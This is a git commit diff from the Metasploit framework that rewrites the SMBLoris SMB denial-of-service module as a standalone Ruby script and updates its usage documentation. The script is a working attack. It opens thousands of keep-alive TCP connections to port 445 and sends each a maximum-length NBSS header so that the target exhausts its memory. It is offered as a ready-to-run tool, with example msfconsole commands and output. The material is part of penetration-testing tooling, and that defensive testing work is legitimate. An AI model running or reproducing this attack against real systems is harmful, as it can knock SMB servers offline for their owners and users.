Convert SMBLoris to an external module

2018-03-23 14:55:18 -05:00 · 2018-03-23 14:55:18 -05:00 · 5ece14b064
parent 71149e9c68
commit 5ece14b064
2 changed files with 100 additions and 97 deletions
--- a/documentation/modules/auxiliary/dos/smb/smb_loris.md
+++ b/documentation/modules/auxiliary/dos/smb/smb_loris.md
@ -14,7 +14,7 @@

  1. Start msfconsole
  1. Do: `use auxiliary/dos/smb/smb_loris`
-  1. Do: `set RHOST [IP]`
+  1. Do: `set rhost [IP]`
  1. Do: `run`
  1. Target should allocate increasing amounts of memory.

@ -30,14 +30,11 @@ msf auxiliary(smb_loris) >

 msf auxiliary(smb_loris) > run

-[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
-....
+[*] Starting server...
+[*] 192.168.172.138:445 - 100 socket(s) open
+[*] 192.168.172.138:445 - 200 socket(s) open
+...
+[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
+[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
+...
 ```
--- a/modules/auxiliary/dos/smb/smb_loris.rb
+++ b/modules/auxiliary/dos/smb/smb_loris.rb
@ -1,14 +1,9 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
+#!/usr/bin/env ruby
+
+require 'socket'
+require 'metasploit'

 require 'bindata'
-require 'ruby_smb'
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Exploit::Remote::Tcp
-  include Msf::Auxiliary::Dos

 class NbssHeader < BinData::Record
  endian  :little
@ -17,10 +12,9 @@ class MetasploitModule < Msf::Auxiliary
  bit17   :message_length
 end

-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'SMBLoris NBSS Denial of Service',
-      'Description'    => %q{
+metadata = {
+  name: 'SMBLoris NBSS Denial of Service',
+  description: %q{
    The SMBLoris attack consumes large chunks of memory in the target by sending
    SMB requests with the NetBios Session Service(NBSS) Length Header value set
    to the maximum possible value. By keeping these connections open and initiating
@ -32,58 +26,70 @@ class MetasploitModule < Msf::Auxiliary
    your system's ULIMIT to make sure it can handle it. This module will also run
    continuously until stopped.
  },
-      'Author'          =>
-        [
-          'thelightcosine'
+  authors: [
+      'thelightcosine',
+      'Adam Cammack <adam_cammack[at]rapid7.com>'
  ],
-      'License'         => MSF_LICENSE,
-      'References'      =>
-        [
-          [ 'URL', 'http://smbloris.com/' ]
+  date: '2017-06-29',
+  references: [
+    { type: 'url', ref: 'http://smbloris.com/' }
  ],
-      'DisclosureDate' => 'Jul 29 2017'
-    ))
+  type: 'dos',
+  options: {
+    rhost: {type: 'address', description: 'The target address', required: true, default: nil},
+    rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},
+  }
+}

-    register_options(
-      [
-        Opt::RPORT(445)
-      ])
-  end
-
-  def run
+def run(args)
  header = NbssHeader.new
  header.message_length = 0x01FFFF

-    linger = Socket::Option.linger(true, 60)
+  last_reported = 0
+  warned = false
+  n_loops = 0
+  sockets = []
+
+  target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)
+
+  Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "

  while true do
-      sockets = {}
-      (1025..65535).each do |src_port|
-        print_status "Sending packet from Source Port: #{src_port}"
-        opts = {
-          'CPORT'           => src_port,
-          'ConnectTimeout'  => 360
-        }
-
-        if sockets[src_port]
-          disconnect(sockets[src_port])
+    begin
+      sockets.delete_if do |s|
+        s.closed?
      end

-        begin
-          nsock = connect(false, opts)
+      nsock = target.connect(timeout: 360)
      nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
-          nsock.setsockopt(linger)
+      nsock.setsockopt(Socket::Option.linger(true, 60))
      nsock.write(header.to_binary_s)
-          sockets[src_port] = nsock
-        rescue ::Exception => e
-          print_error "Exception sending packet: #{e.message}"
+      sockets << nsock
+
+      n_loops += 1
+      if  last_reported != sockets.length
+        if n_loops % 100 == 0
+          last_reported = sockets.length
+          Metasploit.log "#{sockets.length} socket(s) open", level: 'info'
+        end
+      elsif n_loops % 1000 == 0
+        Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'
+      end
+    rescue Interrupt
+      break
+      sockets.each &:close
+    rescue Errno::EMFILE
+      Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing you system limits.", level: 'warning' unless warned
+      warned = true
+      sockets.slice(0).close
+    rescue Exception => e
+      Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
    end
  end
 end

-
-  end
-
+if __FILE__ == $PROGRAM_NAME
+  Metasploit.run(metadata, method(:run))
 end